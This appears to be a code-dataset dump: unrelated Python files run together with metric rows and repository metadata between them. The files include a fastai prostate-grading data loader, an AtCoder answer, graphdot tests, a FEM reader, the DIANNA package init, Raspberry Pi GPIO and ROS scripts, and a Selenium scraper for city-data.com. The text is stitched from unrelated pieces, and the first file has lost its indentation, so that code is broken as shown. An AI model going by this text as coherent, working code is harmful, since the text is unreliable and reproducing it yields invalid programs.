fn_cats = os.path.join(self.TRAIN, f'{image_id}_mask.txt')
if os.path.isfile(fn_cats):
with open(fn_cats) as f:
return [int(int(l)>1) for l in f.readlines()]
else:
raise Exception("File not found", str(fn_cats))
def _findAllReplicates(self, pairs, seed):
replicates = [seed]
nodes = [seed]
def addReplicate(n):
if n not in replicates:
replicates.append(n)
nodes.append(n)
# while there are nodes left
while len(nodes) > 0:
this_node = nodes[0]
for i,j in pairs:
if i==this_node:
# match - add j to replicates
addReplicate(j)
elif j==this_node:
# match - add i to replicates
addReplicate(i)
nodes.pop(0)
return replicates
def _pairs2sameFolds(self, df,pairs):
replicate_indices = np.unique(pairs)
split_values = df.split.values
for ind in replicate_indices:
allReps = self._findAllReplicates(list(pairs), ind)
# set all to the same fold as the minimum index
min_rep = min(allReps)
target_fold = split_values[min_rep]
for rep in allReps:
split_values[rep] = target_fold
df.split = split_values
return df
def _prepare_data(self, TRAIN, LABELS):
df = pd.read_csv(LABELS).set_index('image_id')
files = set([p[:32] for p in os.listdir(TRAIN)])
df = df.loc[files]
df = df.reset_index()
df['stratify'] = df.data_provider.map(str) + '-' + df.isup_grade.map(str)
splits = StratifiedKFold(n_splits=self.nfolds, random_state=self.SEED, shuffle=True)
splits = list(splits.split(df,df.stratify))
folds_splits = np.zeros(len(df)).astype(np.int)
for i in range(self.nfolds): folds_splits[splits[i][1]] = i
df['split'] = folds_splits
if self.is_ordinal:
def _transform_ordinal(label):
#return ','.join([str(i) for i in range(int(label) + 1)])
return ','.join([str(i) for i in range(int(label))])
df.isup_grade = df.isup_grade.apply(_transform_ordinal)
# add tile cancer categories if present in train data
if self.model_name in ["multihead_tilecat", "multihead_tilecat_attention"]:
cancer_labels = np.array([np.array(self._cats4slide(image_id)) for image_id in df.image_id.values])
for i in range(cancer_labels.shape[1]):
df[f'cancer_status_{i}'] = list(cancer_labels[:,i])
# set serial section replicates to same folds
pairs_fn = os.path.join('../','pair_indices.npy')
if os.path.exists(pairs_fn):
pairs = np.load(pairs_fn)
print(f'Setting {np.array(pairs).shape[0]} serial section replicates to same folds')
df = self._pairs2sameFolds(df, pairs)
self.df = df
def get_data(self,fold=0, **kwargs):
model_name = "iafoss" if self.model_name is None else self.model_name
regr = "regr" in model_name
def __MImageItemList():
""" This returns MImageItemList with specified defaults """
return MImageItemList.from_df(self.df,
path='.',
folder=self.TRAIN,
cols='image_id',
sz=self.sz,
N=self.N,
mean=self.mean,
std=self.std,
uniform_augmentations=self.uniform_augmentations,
shuffle_nonempty_imgs=self.shuffle_nonempty_imgs
)
if model_name in ["multihead_tilecat", "multihead_tilecat_attention"] and self.is_train:
# create isup LabelItemList
isup_labels = (
(__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade']))
)
# create the dict to hold all LabelItemLists
multitask_project = {
'isup': {
'label_lists': isup_labels,
}
}
# add tile cancer categories to the dict
for i in range(self.N):
tilecat = (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=[f'cancer_status_{i}']))
multitask_project[f'tilecat_{i}'] = {
'label_lists': tilecat,
}
ItemLists.label_from_mt_project = label_from_mt_project
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_mt_project(multitask_project)
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
else: # Defaults to Iafoss
if self.is_ordinal:
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade'], label_cls=None, label_delim=',')
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
else:
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade'], label_cls=FloatList if regr==True else None)
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
| 40.819095 | 111 | 0.519266 | 7,892 | 0.971562 | 0 | 0 | 0 | 0 | 0 | 0 | 934 | 0.114982 |
7b0127f18652a5554693ea5f44876da7eca25e09
| 281 |
py
|
Python
|
ABC/194/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
ABC/194/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
ABC/194/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
def main():
# input
A, B = map(int, input().split())
# compute
# output
if A+B>=15 and B >= 8:
print(1)
elif A+B>=10 and B>=3:
print(2)
elif A+B >= 3:
print(3)
else:
print(4)
if __name__ == '__main__':
main()
| 14.05 | 36 | 0.441281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.120996 |
7b0281efeed9226063f79960fa17b68b47603613
| 2,578 |
py
|
Python
|
test/graph/test_from_ase.py
|
yhtang/GraphDot
|
3d5ed4fbb2f6912052baa42780b436da76979691
|
[
"BSD-3-Clause-LBNL"
] | 9 |
2020-02-14T18:07:39.000Z
|
2021-12-15T12:07:31.000Z
|
test/graph/test_from_ase.py
|
yhtang/graphdot
|
3d5ed4fbb2f6912052baa42780b436da76979691
|
[
"BSD-3-Clause-LBNL"
] | 3 |
2020-03-19T19:07:26.000Z
|
2021-02-24T06:08:51.000Z
|
test/graph/test_from_ase.py
|
yhtang/graphdot
|
3d5ed4fbb2f6912052baa42780b436da76979691
|
[
"BSD-3-Clause-LBNL"
] | 3 |
2019-10-17T06:11:18.000Z
|
2021-05-07T11:56:33.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
from ase.build import molecule
from ase.lattice.cubic import SimpleCubic
from graphdot.graph import Graph
from graphdot.graph.adjacency import AtomicAdjacency
adjacencies = [
AtomicAdjacency(shape='tent1', length_scale=1.0, zoom=1),
AtomicAdjacency(shape='tent2', length_scale='vdw_radius', zoom=1),
AtomicAdjacency(
shape='gaussian', length_scale='covalent_radius_pyykko', zoom=1.5
),
AtomicAdjacency(shape='compactbell3,2'),
]
def test_ase_one():
atoms = molecule('H2')
graph = Graph.from_ase(atoms)
assert(len(graph.nodes) == 2)
assert(len(graph.edges) == 1)
@pytest.mark.parametrize('atoms', [
SimpleCubic(latticeconstant=2, size=(2, 1, 1), symbol='Cu', pbc=(1, 0, 0)),
SimpleCubic(latticeconstant=2, size=(1, 2, 1), symbol='Cu', pbc=(0, 1, 0)),
SimpleCubic(latticeconstant=2, size=(1, 1, 2), symbol='Cu', pbc=(0, 0, 1)),
])
@pytest.mark.parametrize('adj', adjacencies)
def test_ase_pbc1(atoms, adj):
graph_pbc = Graph.from_ase(atoms, use_pbc=True, adjacency=adj)
graph_nopbc = Graph.from_ase(atoms, use_pbc=False, adjacency=adj)
assert(len(graph_pbc.edges) == len(graph_nopbc.edges))
@pytest.mark.parametrize('atoms', [
SimpleCubic(latticeconstant=2, size=(3, 1, 1), symbol='Cu', pbc=(1, 0, 0)),
SimpleCubic(latticeconstant=2, size=(4, 1, 1), symbol='Cu', pbc=(1, 0, 0)),
SimpleCubic(latticeconstant=2, size=(7, 1, 1), symbol='Cu', pbc=(1, 0, 0)),
SimpleCubic(latticeconstant=2, size=(1, 3, 1), symbol='Cu', pbc=(0, 1, 0)),
SimpleCubic(latticeconstant=2, size=(1, 4, 1), symbol='Cu', pbc=(0, 1, 0)),
SimpleCubic(latticeconstant=2, size=(1, 7, 1), symbol='Cu', pbc=(0, 1, 0)),
SimpleCubic(latticeconstant=2, size=(1, 1, 3), symbol='Cu', pbc=(0, 0, 1)),
SimpleCubic(latticeconstant=2, size=(1, 1, 4), symbol='Cu', pbc=(0, 0, 1)),
SimpleCubic(latticeconstant=2, size=(1, 1, 7), symbol='Cu', pbc=(0, 0, 1)),
])
def test_ase_pbc2(atoms):
adj = AtomicAdjacency(shape='tent1', length_scale=1.0, zoom=1)
graph_pbc = Graph.from_ase(atoms, use_pbc=True, adjacency=adj)
graph_nopbc = Graph.from_ase(atoms, use_pbc=False, adjacency=adj)
assert(len(graph_pbc.edges) > len(graph_nopbc.edges))
@pytest.mark.parametrize('atoms', [
molecule('H2'),
molecule('CH4'),
molecule('CH3COOH'),
SimpleCubic(latticeconstant=1, size=(3, 3, 1), symbol='Cu', pbc=(1, 1, 0)),
])
def test_ase(atoms):
g = Graph.from_ase(atoms)
assert(len(g.nodes) == len(atoms))
assert(len(g.edges) > 0)
| 38.477612 | 79 | 0.660978 | 0 | 0 | 0 | 0 | 1,899 | 0.736618 | 0 | 0 | 227 | 0.088053 |
7b02e549c87583bcf554b71f024544d0bb0dac0a
| 2,735 |
py
|
Python
|
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
import string
import scipy
import PslgIo, ElementAwarePslg
def loadEle(filename):
pslg = ElementAwarePslg.ElementAwarePslg()
file = open(filename, "r")
try:
PslgIo.readFromFile(file, pslg, filename)
finally:
file.close()
return pslg
def saveFem(filename, femResults):
#Open the file
file = open(filename, "w")
#Header
line = saveHeader(file, len(femResults), femResults[0][1].shape[0])
#Actual contents
try:
for solutionDesc in femResults:
saveResult(file, solutionDesc)
finally:
file.close()
return
def saveResult(file, solutionDesc):
file.write(str(solutionDesc[0]) + "\n")
for i in range(0, solutionDesc[1].shape[0]):
line = "%.12f" % solutionDesc[1][i,0]
file.write(line + "\n")
file.flush()
def saveRelease(file, releaseDesc):
file.write(str(releaseDesc[0]) + "\t" + str(releaseDesc[1]) + "\n")
file.flush()
def saveHeader(file, timeSteps, variableNumber):
line = str(timeSteps) + " " + str(variableNumber) + "\n"
file.write(line)
file.flush()
def loadFem(filename):
results = []
file = open(filename, "r")
try:
resultNumber, n = readHeader(file)
for i in range(0, resultNumber):
time = float(getLine(file))
z = []
for j in range(0, n):
currentZ = float(getLine(file))
z.append(currentZ)
results.append((time, z))
finally:
file.close()
return results
def loadLastFemresult(filename):
result = None
file = open(filename, "r")
try:
#Skip header
resultNumber, n = readHeader(file)
currentLine = getLine(file)
while len(currentLine) > 0:
#Get the current record
time = float(currentLine)
z = []
for j in range(0, n):
currentZ = float(getLine(file))
z.append(currentZ)
result = (time, z)
#Get next line
currentLine = getLine(file)
except:
pass
finally:
file.close()
if(result is not None):
return (result[0], scipy.array([result[1]]).transpose())
else:
return None
def readHeader(file):
headerLine = getLine(file)
if len(headerLine) > 0:
tokens = string.split(headerLine)
if len(tokens) != 2:
raise IOError("Invalid file format (header should contain exactly two positive integers)")
return (int(tokens[0]), int(tokens[1]))
else:
raise IOError("Invalid file format (header not found)")
def getLine(file):
return string.strip(file.readline())
| 27.35 | 102 | 0.571115 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 243 | 0.088848 |
7b04376d12aae979563b6b36b34ff0b76d2dcff0
| 3,466 |
py
|
Python
|
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
"""
DIANNA: Deep Insight And Neural Network Analysis.
Modern scientific challenges are often tackled with (Deep) Neural Networks (DNN).
Despite their high predictive accuracy, DNNs lack inherent explainability. Many DNN
users, especially scientists, do not harvest DNNs power because of lack of trust and
understanding of their working.
Meanwhile, the eXplainable AI (XAI) methods offer some post-hoc interpretability and
insight into the DNN reasoning. This is done by quantifying the relevance of individual
features (image pixels, words in text, etc.) with respect to the prediction. These
"relevance heatmaps" indicate how the network has reached its decision directly in the
input modality (images, text, speech etc.) of the data.
There are many Open Source Software (OSS) implementations of these methods, alas,
supporting a single DNN format and the libraries are known mostly by the AI experts.
The DIANNA library supports the best XAI methods in the context of scientific usage
providing their OSS implementation based on the ONNX standard and demonstrations on
benchmark datasets. Representing visually the captured knowledge by the AI system can
become a source of (scientific) insights.
See https://github.com/dianna-ai/dianna
"""
import logging
from onnx_tf.backend import prepare # To avoid Access Violation on Windows with SHAP
from . import methods
from . import utils
logging.getLogger(__name__).addHandler(logging.NullHandler())
__author__ = "DIANNA Team"
__email__ = "[email protected]"
__version__ = "0.2.1"
def explain_image(model_or_function, input_data, method, labels=(1,), **kwargs):
"""
Explain an image (input_data) given a model and a chosen method.
Args:
model_or_function (callable or str): The function that runs the model to be explained _or_
the path to a ONNX model on disk.
input_data (np.ndarray): Image data to be explained
method (string): One of the supported methods: RISE, LIME or KernelSHAP
labels (tuple): Labels to be explained
Returns:
One heatmap (2D array) per class.
"""
explainer = _get_explainer(method, kwargs)
explain_image_kwargs = utils.get_kwargs_applicable_to_function(explainer.explain_image, kwargs)
return explainer.explain_image(model_or_function, input_data, labels, **explain_image_kwargs)
def explain_text(model_or_function, input_data, method, labels=(1,), **kwargs):
"""
Explain text (input_data) given a model and a chosen method.
Args:
model_or_function (callable or str): The function that runs the model to be explained _or_
the path to a ONNX model on disk.
input_data (string): Text to be explained
method (string): One of the supported methods: RISE or LIME
labels (tuple): Labels to be explained
Returns:
List of (word, index of word in raw text, importance for target class) tuples.
"""
explainer = _get_explainer(method, kwargs)
explain_text_kwargs = utils.get_kwargs_applicable_to_function(explainer.explain_text, kwargs)
return explainer.explain_text(model_or_function, input_data, labels, **explain_text_kwargs)
def _get_explainer(method, kwargs):
method_class = getattr(methods, method)
method_kwargs = utils.get_kwargs_applicable_to_function(method_class.__init__, kwargs)
return method_class(**method_kwargs)
| 42.790123 | 99 | 0.742643 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,388 | 0.688979 |
7b0494a9e41efc09a0891a5e4ffe2bfd4e84d0d3
| 2,925 |
py
|
Python
|
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
try:
import RPi.GPIO as GPIO
except RuntimeError:
print("Error importing RPi.GPIO! This is probably because you need "
"superuser privileges. You can achieve this by using 'sudo' to run "
"your script")
gpios = [7, 8, 10, 11, 12, 13, 15, 16, 18, 19, 21, 22, 23, 24, 26, 29,
31, 32, 33, 35, 36, 37, 38, 40]
class Pin:
def __init__(self, number, value):
self.number = number
self.value = value
self.mode = 'out'
def set_value(self, value):
try:
GPIO.output(self.number, GPIO.HIGH if value else GPIO.LOW)
except:
pass
self.value = value
def set_mode(self, mode):
if mode == 'in' or mode == 'out':
self.mode = mode
try:
if mode == 'in':
GPIO.setup(self.number, GPIO.IN)
self.value = bool(GPIO.input(self.number))
print("set mode to in (value=" + str(self.value) + ")")
return self.value
else:
GPIO.setup(self.number, GPIO.OUT)
self.value = bool(GPIO.input(self.number))
print("set mode to out (value=" + str(self.value) + ")")
return self.value
except:
return self.value
def switch_value(self):
try:
GPIO.output(self.number, GPIO.LOW if self.value else GPIO.HIGH)
except:
pass
self.value = not self.value
def switch_mode(self):
if self.mode == 'out':
return 'in', self.set_mode('in')
else:
return 'out', self.set_mode('out')
class Header:
def __init__(self):
self.left_pins = []
self.right_pins = []
for x in gpios:
if x % 2 == 1:
self.left_pins.append(Pin(x, False))
else:
self.right_pins.append(Pin(x, False))
def get_value(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
return pin.value
def set_value(self, number, value):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
pin.set_value(value)
break
def switch_value(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
pin.switch_value()
break
def switch_mode(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
return pin.switch_mode()
header = Header()
try:
GPIO.setmode(GPIO.BOARD)
for id in gpios:
print('Initializing gpio ' + str(id))
GPIO.setup(id, GPIO.OUT, initial=GPIO.LOW)
print('Initialized GPIOs')
except:
print('Could not set GPIO mode to BOARD.')
| 29.545455 | 79 | 0.523419 | 2,318 | 0.792479 | 0 | 0 | 0 | 0 | 0 | 0 | 315 | 0.107692 |
7b04e005435865593cbdccc3f6d9e91235157df4
| 1,395 |
py
|
Python
|
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | null | null | null |
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | 1 |
2017-12-14T14:04:24.000Z
|
2017-12-14T16:58:05.000Z
|
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import rospy # For all things ros with python
# JointState is defined in sensor_msgs.msg
# If you know a message but not where it is
# call rosmsg info MSGNAME from the terminal
from sensor_msgs.msg import JointState
# This tutorial takes heavily from
# http://wiki.ros.org/ROS/Tutorials/WritingPublisherSubscriber(python)
# In this example we make a simple subscriber that listens for JointState
# messages, and prints them. Uses a functional approach.
def message_callback(msg):
"""This function is called on the message every time a message arrives."""
rospy.loginfo("Joint position received:"+str(msg.position))
def joint_listener():
"""Blocking function that sets up node, subscription and waits for
messages."""
# Start ros node
rospy.init_node("joint_listener", anonymous=True)
# Tell the central command we want to hear about /joint_states
rospy.Subscriber("/joint_states", # Topic we subscribe to
JointState, # message type that topic has
message_callback) # function to call when message arrives
rospy.spin()
# If this script is run alone, not just imported:
if __name__ == "__main__":
joint_listener()
# Ensure that the python script is executable by running:
# chmod +x joint_subscriber.py
# Call this script by running:
# rosrun joint_subscriber joint_subscriber.py
| 34.875 | 79 | 0.7319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,019 | 0.730466 |
7b0521366a87b5722240ee07005b1b01f21cf17a
| 1,291 |
py
|
Python
|
src/lab4_cam/src/sawyercam.py
|
citronella3alain/baxterDraw
|
c050254e8b4b8d4f5087e8743a34289844138e0c
|
[
"MIT"
] | null | null | null |
src/lab4_cam/src/sawyercam.py
|
citronella3alain/baxterDraw
|
c050254e8b4b8d4f5087e8743a34289844138e0c
|
[
"MIT"
] | null | null | null |
src/lab4_cam/src/sawyercam.py
|
citronella3alain/baxterDraw
|
c050254e8b4b8d4f5087e8743a34289844138e0c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Aran Sena 2018
#
# Code example only, provided without guarantees
#
# Example for how to get both cameras streaming together
#
####
import rospy
from intera_core_msgs.srv._IOComponentCommandSrv import IOComponentCommandSrv
from intera_core_msgs.msg._IOComponentCommand import IOComponentCommand
def camera_command_client(camera, status, timeout=0.0):
rospy.wait_for_service('/io/internal_camera/' + camera + '/command')
try:
cam_control = rospy.ServiceProxy('/io/internal_camera/' + camera + '/command', IOComponentCommandSrv)
cmd = IOComponentCommand()
cmd.time = rospy.Time.now()
cmd.op = 'set'
if status:
cmd.args = '{"signals": {"camera_streaming": {"data": [true], "format": {"type": "bool"}}}}'
else:
cmd.args = '{"signals": {"camera_streaming": {"data": [false], "format": {"type": "bool"}}}}'
resp = cam_control(cmd, timeout)
print resp
except rospy.ServiceException, e:
print "Service call failed: %s"%e
if __name__ == '__main__':
rospy.init_node('camera_command_client')
camera_command_client(camera='head_camera', status=True)
camera_command_client(camera='right_hand_camera', status=True)
| 33.102564 | 110 | 0.655306 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 478 | 0.370256 |
7b061600468274d3cebd155c75fff8f1303d7256
| 12,279 |
py
|
Python
|
citydata/crime.py
|
JackKirbyCook82/neighborhood
|
3805fa11890e121ffadcaaf8f02323434cb68519
|
[
"MIT"
] | null | null | null |
citydata/crime.py
|
JackKirbyCook82/neighborhood
|
3805fa11890e121ffadcaaf8f02323434cb68519
|
[
"MIT"
] | null | null | null |
citydata/crime.py
|
JackKirbyCook82/neighborhood
|
3805fa11890e121ffadcaaf8f02323434cb68519
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun May 2 2021
@name: CityData CensusTract Download Application
@author: Jack Kirby Cook
"""
import sys
import os.path
import warnings
import logging
import regex as re
MAIN_DIR = os.path.dirname(os.path.realpath(__file__))
MODULE_DIR = os.path.abspath(os.path.join(MAIN_DIR, os.pardir))
ROOT_DIR = os.path.abspath(os.path.join(MODULE_DIR, os.pardir))
RESOURCE_DIR = os.path.join(ROOT_DIR, "resources")
SAVE_DIR = os.path.join(ROOT_DIR, "save")
DRIVER_FILE = os.path.join(RESOURCE_DIR, "chromedriver.exe")
REPOSITORY_DIR = os.path.join(SAVE_DIR, "citydata")
QUEUE_FILE = os.path.join(RESOURCE_DIR, "zipcodes.zip.csv")
REPORT_FILE = os.path.join(SAVE_DIR, "citydata", "censustracts.csv")
if ROOT_DIR not in sys.path:
sys.path.append(ROOT_DIR)
from utilities.iostream import InputParser
from utilities.dataframes import dataframe_parser
from webscraping.webtimers import WebDelayer
from webscraping.webdrivers import WebDriver
from webscraping.weburl import WebURL
from webscraping.webpages import WebBrowserPage
from webscraping.webpages import BadRequestError
from webscraping.webpages import WebContents
from webscraping.webloaders import WebLoader
from webscraping.webquerys import WebQuery, WebDatasets
from webscraping.webqueues import WebScheduler
from webscraping.webdownloaders import WebDownloader, CacheMixin, AttemptsMixin
from webscraping.webdata import WebClickable, WebText, WebInput, WebSelect
from webscraping.webactions import WebScroll, WebMoveTo, WebMoveToClick, WebMoveToClickSelect, WebMoveToClickFillSend
__version__ = "1.0.0"
__author__ = "Jack Kirby Cook"
__all__ = ["CityData_WebDelayer", "CityData_WebDownloader", "CityData_WebScheduler"]
__copyright__ = "Copyright 2021, Jack Kirby Cook"
__license__ = ""
LOGGER = logging.getLogger(__name__)
warnings.filterwarnings("ignore")
DATASETS = {"violentcrime": "Crime - Violent crime index", "propertycrime": "Crime - Property crime index", "airpollution": "Air pollution - Air Quality Index (AQI)"}
GEOGRAPHYS = ("state", "county", "tract", "blockgroup")
dataset_select_xpath = r"//select[contains(@id, 'selmapOSM')]"
zipcode_click_xpath = r"//div[@id='searchOSM']//div[contains(@id, 'sboxOuter')]//b"
zipcode_input_xpath = r"//div[@id='searchOSM']//div[contains(@id, 'sboxOuter')]//input[contains(@id, 's2id')]"
zipcode_xpath = r"//div[@id='searchOSM']//div[contains(@id, 'sboxOuter')]//span[@class='select2-chosen']"
geography_xpath = r"//div[@id='legendBOX']/div[@id='mapOSM_legend']"
canvas_xpath = r"//div[@id='mapOSM']//canvas"
fullscreen_xpath = r"//div[@id='mapOSM']//a[@title='Full Screen']"
zoomin_xpath = r"//div[@id='mapOSM']//a[@title='Zoom in']"
zoomout_xpath = r"//div[@id='mapOSM']//a[@title='Zoom out']"
dataset_select_webloader = WebLoader(xpath=dataset_select_xpath)
zipcode_click_webloader = WebLoader(xpath=zipcode_click_xpath)
zipcode_input_webloader = WebLoader(xpath=zipcode_input_xpath)
zipcode_webloader = WebLoader(xpath=zipcode_xpath)
geography_webloader = WebLoader(xpath=geography_xpath)
canvas_webloader = WebLoader(xpath=canvas_xpath)
fullscreen_webloader = WebLoader(xpath=fullscreen_xpath)
zoomin_webloader = WebLoader(xpath=zoomin_xpath)
zoomout_webloader = WebLoader(xpath=zoomout_xpath)
zipcode_parser = lambda x: re.findall("^\d{5}(?=\, [A-Z]{2}$)", str(x).strip())[0]
state_parser = lambda x: re.findall("(?<=^\d{5}\, )[A-Z]{2}$", str(x).strip())[0]
geography_parser = lambda x: {"block groups": "blockgroup", "tracts": "tract", "counties": "county", "states": "state"}[re.findall("(?<=Displaying\: )[a-z ]+(?=\.)", str(x).strip())[0]]
geography_pattern = "(?P<blockgroup>(?<=Census Block Group )[\.0-9]+)|(?P<tract>(?<=Census Tract )[\.0-9]+)|(?P<state>(?<=\, )[A-Z]{2}|(?<=\()[A-Z]{2}(?=\)))|(?P<county>[a-zA-Z ]+ County(?=\, ))"
class CityData_DatasetSelect(WebSelect, webloader=dataset_select_webloader, mapping=DATASETS): pass
class CityData_ZipcodeClick(WebClickable, webloader=zipcode_click_webloader): pass
class CityData_ZipcodeInput(WebInput, webloader=zipcode_input_webloader): pass
class CityData_Zipcode(WebText, webloader=zipcode_webloader, parsers={"data": zipcode_parser}): pass
class CityData_Geography(WebText, webloader=geography_webloader, parsers={"data": geography_parser}): pass
class CityData_Canvas(WebClickable, webloader=canvas_webloader): pass
class CityData_FullScreen(WebClickable, webloader=fullscreen_webloader): pass
class CityData_ZoomIn(WebClickable, webloader=zoomin_webloader): pass
class CityData_ZoomOut(WebClickable, webloader=zoomout_webloader): pass
class CityData_Scroll_WebAction(WebScroll): pass
class CityData_DatasetSelect_MoveToClickSelect_WebAction(WebMoveToClickSelect, on=CityData_DatasetSelect, wait=3): pass
class CityData_ZipcodeClick_MoveToClick_WebAction(WebMoveToClick, on=CityData_ZipcodeClick, wait=1): pass
class CityData_ZipcodeInput_MoveToClick_WebAction(WebMoveToClickFillSend, on=CityData_ZipcodeInput, wait=1): pass
class CityData_Canvas_MoveTo_WebAction(WebMoveTo, on=CityData_Canvas): pass
class CityData_FullScreen_MoveToClick_WebAction(WebMoveToClick, on=CityData_FullScreen): pass
class CityData_ZoomIn_MoveToClick_WebAction(WebMoveToClick, on=CityData_ZoomIn): pass
class CityData_ZoomOut_MoveToClick_WebAction(WebMoveToClick, on=CityData_ZoomOut): pass
class CityData_WebDelayer(WebDelayer): pass
class CityData_WebDriver(WebDriver, options={"headless": False, "images": True, "incognito": False}): pass
class CityData_WebURL(WebURL, protocol="https", domain="www.city-data.com"): pass
class CityData_WebQuery(WebQuery, querys=["zipcode", "geography"]): pass
class CityData_WebDatasets(WebDatasets, fields=list(DATASETS.keys())): pass
class CityData_WebScheduler(WebScheduler, querys=["zipcode"], geography=list(GEOGRAPHYS[1:])):
def zipcode(self, *args, state=None, county=None, countys=[], city=None, citys=[], **kwargs):
dataframe = self.load(QUEUE_FILE)
assert all([isinstance(item, (str, type(None))) for item in (county, city)])
assert all([isinstance(item, list) for item in (countys, citys)])
countys = list(set([item for item in [county, *countys] if item]))
citys = list(set([item for item in [city, *citys] if item]))
dataframe = dataframe_parser(dataframe, parsers={"zipcode": lambda x: "{:05.0f}".format(int(x))}, defaultparser=str)
dataframe = dataframe[["zipcode", "type", "city", "state", "county"]]
dataframe = dataframe[dataframe["type"] == "standard"][["zipcode", "city", "state", "county"]].reset_index(drop=True)
dataframe = dataframe[(dataframe["city"].isin(list(citys)) | dataframe["county"].isin(list(countys)))]
dataframe = dataframe[dataframe["state"] == state]
return list(dataframe["zipcode"].to_numpy())
@staticmethod
def execute(querys, *args, **kwargs): return [CityData_WebQuery(query) for query in querys]
class CityData_WebContents(WebContents):
SCROLL = CityData_Scroll_WebAction
ZIPCODE = CityData_Zipcode
GEOGRAPHY = CityData_Geography
SELECT = CityData_DatasetSelect_MoveToClickSelect_WebAction
CLICK = CityData_ZipcodeClick_MoveToClick_WebAction
INPUT = CityData_ZipcodeInput_MoveToClick_WebAction
CANVAS = CityData_Canvas_MoveTo_WebAction
FULLSCREEN = CityData_FullScreen_MoveToClick_WebAction
ZOOMIN = CityData_ZoomIn_MoveToClick_WebAction
ZOOMOUT = CityData_ZoomOut_MoveToClick_WebAction
class CityData_WebPage(WebBrowserPage, contents=CityData_WebContents):
def search(self, *args, dataset, zipcode, **kwargs):
assert dataset in DATASETS
self.load[CityData_WebContents.SCROLL](*args, **kwargs)
self[CityData_WebContents.SCROLL](*args, commands={"pagedown": 1}, **kwargs)
LOGGER.info("Search: {}|{}|{}".format(str(self), str(dataset).title(), str(zipcode)))
self.load[CityData_WebContents.SELECT](*args, **kwargs)
self[CityData_WebContents.SELECT](*args, select=str(dataset), **kwargs)
self.load[CityData_WebContents.CLICK](*args, **kwargs)
self.load[CityData_WebContents.INPUT](*args, **kwargs)
self[CityData_WebContents.CLICK](*args, **kwargs)
self[CityData_WebContents.INPUT](*args, fill=str(zipcode), **kwargs)
self[CityData_WebContents.CLICK](*args, offset=(0, 1), **kwargs)
def setup(self, *args, geography, **kwargs):
assert geography in GEOGRAPHYS
self.load[CityData_WebContents.CANVAS](*args, **kwargs)
self.load[CityData_WebContents.FULLSCREEN](*args, **kwargs)
self.load[CityData_WebContents.ZOOMIN](*args, **kwargs)
self.load[CityData_WebContents.ZOOMOUT](*args, **kwargs)
self[CityData_WebContents.FULLSCREEN](*args, **kwargs)
self.load[CityData_WebContents.GEOGRAPHY](*args, **kwargs)
while self[CityData_WebContents.GEOGRAPHY].data() != geography:
if GEOGRAPHYS.index(self[CityData_WebContents.GEOGRAPHY].data()) < GEOGRAPHYS.index(geography):
self[CityData_WebContents.ZOOMIN](*args, **kwargs)
